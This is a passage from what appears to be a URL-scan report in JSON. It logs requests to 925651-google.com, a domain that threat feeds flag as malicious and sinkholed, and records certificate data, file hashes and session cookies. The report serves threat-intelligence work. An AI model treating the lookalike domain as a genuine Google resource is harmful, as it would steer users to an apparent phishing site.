*/*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nContent-Type: application/json\r\nContent-Length: 231\r\nOrigin: https://925651-google.com\r\nDNT: 1\r\nConnection: keep-alive\r\nCookie: _tsid=2971296c-6950-44d8-96a4-527bbcd2f099\r\nSec-Fetch-Dest: empty\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"POST","post_data":{"size":231,"data":"{\"id\":\"2971296c-6950-44d8-96a4-527bbcd2f099\",\"input\":{},\"page\":\"/\",\"domain\":\"925651-google.com\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\",\"_bs\":0,\"_ic\":0,\"_vs\":\"active\",\"_lf\":{}}"}},"response":{"raw":"HTTP/3 200 OK\r\nx-xss-protection: 1; mode=block\r\ncontent-encoding: br\r\ndate: Tue, 21 Apr 2026 09:03:01 GMT\r\ncontent-type: application/json; charset=utf-8\r\npriority: u=4,i=?0\r\ncf-ray: 9efb3692cb540883-OSL\r\ncf-cache-status: DYNAMIC\r\netag: W/\"42-LDTpsXpM+75nAuVC7n1bdN03Urw\"\r\nserver: cloudflare\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\npermissions-policy: geolocation=(), camera=(), microphone=()\r\nreferrer-policy: no-referrer\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=5m2K1cpY0iyvDoBrtqSHPPUm7djO8qOF09%2Fn9Zy7gOCbxbQFtlM5TX4H4q9JjE1yN4otTpN%2FuYpH%2Fs%2Flk3hU%2F5T0hOWkp8WS8tZ0DkBcE0CMBudj%2FCZ21H95%2B0fzUWYQJ3ODovwbHWnHiMfEEg7FpVw%3D\"}]}\r\nx-content-type-options: nosniff\r\nx-frame-options: DENY\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":66,"size_decoded":0,"mime_type":"application/json; charset=utf-8","magic":"JSON text data","md5":"a825755e878073675a2be8cb3e5dd4ee","sha1":"2c34e9b17a4cfbbe6702e542ee7d5b74dd3752bc","sha256":"941d6623d85f364ca5cd02966c47a7e0b5d246ed67d1ec14bd3df90f2abe256c","sha512":"4bdd87c22ba777cae8b068da21b240d123ff665ce155941fc4d5f8dd014ae11da590b2c01e5d37e9c3816a6eb3c2754b5499dce9ac55cbc78f9b3f199c0f045d","ssdeep":"","tlshash":"56a00244d43c217924c49746156c2661ea9e9d7c71b7108149ed59240b109c6c6aca38","first_seen":"2026-04-21T09:03:25.850558Z","last_seen":"2026-04-21T09:03:25.850558Z","times_seen":1,"resource_available":false,"data":null}},"time_used":80,"timings":{"blocked":0,"dns":0,"connect":0,"send":0,"wait":80,"receive":0,"ssl":0},"alerts":{"ids":null,"analyzer":[{"sensor_name":"dns4eu","sensor_type":"DNS","title":"DNS4EU","description":"DNS4EU","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://www.joindns4.eu/","meta":null},{"sensor_name":"hagezi","sensor_type":"DNS","title":"Hagezi Threat Feed","description":"Hagezi Threat Feed","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://github.com/hagezi/dns-blocklists","meta":null}],"urlquery":null}},{"url":{"schema":"https","addr":"925651-google.com/images/logo.png","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"104.21.43.239","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"img","requested_by":"https://925651-google.com/","date":"2026-04-21T09:02:57.539Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"925651-google.com","organization":""},"issuer":{"commonName":"E8","organization":"Let's Encrypt"},"validity":{"start":"Fri, 06 Mar 2026 00:08:47 GMT","end":"Thu, 04 Jun 2026 00:08:46 GMT"},"fingerprint":{"sha1":"6F:4F:89:F8:75:69:42:0E:DB:84:C7:BF:DB:E7:47:3D:4F:43:0B:C3","sha256":"77:BE:4B:82:88:C0:DD:83:11:92:5B:56:8B:1D:26:BC:F0:16:C7:4C:06:22:4D:BA:28:3F:39:F0:7E:B3:B4:FC"}}},"request":{"raw":"GET /images/logo.png HTTP/1.1\r\nHost: 925651-google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: image/avif,image/webp,*/*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nSec-Fetch-Dest: image\r\nSec-Fetch-Mode: no-cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/3 200 OK\r\ncontent-length: 47408\r\npriority: u=4,i=?0\r\ndate: Tue, 21 Apr 2026 09:02:57 GMT\r\ncontent-type: image/png\r\nx-xss-protection: 1; mode=block\r\ncf-ray: 9efb3679988a0883-OSL\r\ncf-cache-status: MISS\r\naccept-ranges: bytes\r\ncache-control: public, max-age=14400\r\nlast-modified: Tue, 21 Apr 2026 09:02:57 GMT\r\nserver: cloudflare\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\npermissions-policy: geolocation=(), camera=(), microphone=()\r\nreferrer-policy: no-referrer\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=IavT9FC%2BbaFoc2t1HeOPOxj3KL7IP5bNowelld15I6PQYz2%2FrNM4yMXSoUuBYoq32q%2FYcNwrdUNBAgVhBbr4ZNTcKQyHbgvCespbcq1Nq0oMADAjSyurfwVDWqqelfayegCpYpCsCLhV%2FVYZRd9KClU%3D\"}]}\r\nx-content-type-options: nosniff\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":47408,"size_decoded":0,"mime_type":"image/png","magic":"PNG image data, 1200 x 1200, 8-bit/color RGBA, non-interlaced","md5":"187d3d52d1217a2c5546391ba889e8c9","sha1":"515fd523e6cecea99686f80f8e266dc91ce32e8e","sha256":"09e47f378c7bd014c4c08ae751765c808509cb34a8e28376e7602c1e6dd9114e","sha512":"d970f6a242d68037da5d20b08bd5ae773b2905311103a955fcb8e4ed3650828613624fb8e7f88befcb37f7c58d7d6dbcde159c11955fe60b2d09b5680c54f43b","ssdeep":"768:Ld/jz08m42SX5HiQUuVVNfJzfb/GIRuCHRp4KJBlpFofnBoMlSybGVeBv:ZXy0X5inkB9/GYHRpl1yyMIybGC","tlshash":"c023f1da4c05ac82caf59e72224b08ebb58453eb753d975bc633b772f49e351109ac8c","first_seen":"2025-07-30T08:14:59.476873Z","last_seen":"2026-04-21T09:16:26.530593Z","times_seen":7,"resource_available":false,"data":null}},"time_used":172,"timings":{"blocked":-1,"dns":0,"connect":0,"send":0,"wait":121,"receive":51,"ssl":0},"alerts":{"ids":null,"analyzer":[{"sensor_name":"hagezi","sensor_type":"DNS","title":"Hagezi Threat Feed","description":"Hagezi Threat Feed","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://github.com/hagezi/dns-blocklists","meta":null},{"sensor_name":"dns4eu","sensor_type":"DNS","title":"DNS4EU","description":"DNS4EU","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://www.joindns4.eu/","meta":null}],"urlquery":null}},{"url":{"schema":"https","addr":"925651-google.com/api/public/mutations","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"104.21.43.239","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"xhr","requested_by":"https://925651-google.com/","date":"2026-04-21T09:02:57.896Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"925651-google.com","organization":""},"issuer":{"commonName":"E8","organization":"Let's Encrypt"},"validity":{"start":"Fri, 06 Mar 2026 00:08:47 GMT","end":"Thu, 04 Jun 2026 00:08:46 GMT"},"fingerprint":{"sha1":"6F:4F:89:F8:75:69:42:0E:DB:84:C7:BF:DB:E7:47:3D:4F:43:0B:C3","sha256":"77:BE:4B:82:88:C0:DD:83:11:92:5B:56:8B:1D:26:BC:F0:16:C7:4C:06:22:4D:BA:28:3F:39:F0:7E:B3:B4:FC"}}},"request":{"raw":"POST /api/public/mutations HTTP/1.1\r\nHost: 925651-google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nContent-Type: application/json\r\nContent-Length: 99\r\nOrigin: https://925651-google.com\r\nDNT: 1\r\nConnection: keep-alive\r\nCookie: _tsid=2971296c-6950-44d8-96a4-527bbcd2f099\r\nSec-Fetch-Dest: empty\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"POST","post_data":{"size":99,"data":"{\"s\":\"2971296c-6950-44d8-96a4-527bbcd2f099\",\"muts\":[{\"t\":\"r\",\"mid\":\"mid8\"},{\"t\":\"r\",\"mid\":\"mid9\"}]}"}},"response":{"raw":"HTTP/3 403 Forbidden\r\ncontent-length: 28\r\npriority: u=3,i=?0\r\ndate: Tue, 21 Apr 2026 09:02:57 GMT\r\ncontent-type: application/json; charset=utf-8\r\nx-xss-protection: 1; mode=block\r\ncf-ray: 9efb367bc8cd0883-OSL\r\ncf-cache-status: DYNAMIC\r\netag: W/\"1c-nWcT8lAoCqDjrCJITDHkT+rfixY\"\r\nserver: cloudflare\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\npermissions-policy: geolocation=(), camera=(), microphone=()\r\nreferrer-policy: no-referrer\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=v95FalbTJW5WlObYFY5R3dHOY%2BL3M6d9AtMav55h2rWBSsOsKSFJF%2FbQwYMtq56wYYS2xfWf9%2BOH%2Byh2NOJGOfWEdInJW1oVDLFQC54mjrc%2BKZoYXjhV413j6BQh8ncHG%2FX63HkOq9NMjoqhdofOIwk%3D\"}]}\r\nx-content-type-options: nosniff\r\nx-frame-options: DENY\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"403","status_text":"Forbidden","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":28,"size_decoded":0,"mime_type":"application/json; charset=utf-8","magic":"JSON text data","md5":"e3d57c361b5914c7a00f9b354d2cdf0f","sha1":"9d6713f250280aa0e3ac22484c31e44feadf8b16","sha256":"549a258bb3491836ef45f626a5508bd53857b9bf3212ebe35effa0839b0c07cb","sha512":"d77130401d4387a0886a3ad1b76cb8bae9fdf861807690ac4842845e8395ebc631d00373d3db728282cd3bb7ebe4e4f66a1c3fb92e6bb4e86778338596781543","ssdeep":"","tlshash":"bb80002fb8082e0803230003302020e2280000800b8823c3088a3008030c8028202200","first_seen":"2026-04-21T09:03:25.847616Z","last_seen":"2026-04-21T09:16:26.526865Z","times_seen":2,"resource_available":false,"data":null}},"time_used":70,"timings":{"blocked":-1,"dns":0,"connect":0,"send":0,"wait":70,"receive":0,"ssl":0},"alerts":{"ids":null,"analyzer":[{"sensor_name":"hagezi","sensor_type":"DNS","title":"Hagezi Threat Feed","description":"Hagezi Threat Feed","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://github.com/hagezi/dns-blocklists","meta":null},{"sensor_name":"dns4eu","sensor_type":"DNS","title":"DNS4EU","description":"DNS4EU","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://www.joindns4.eu/","meta":null}],"urlquery":null}}]}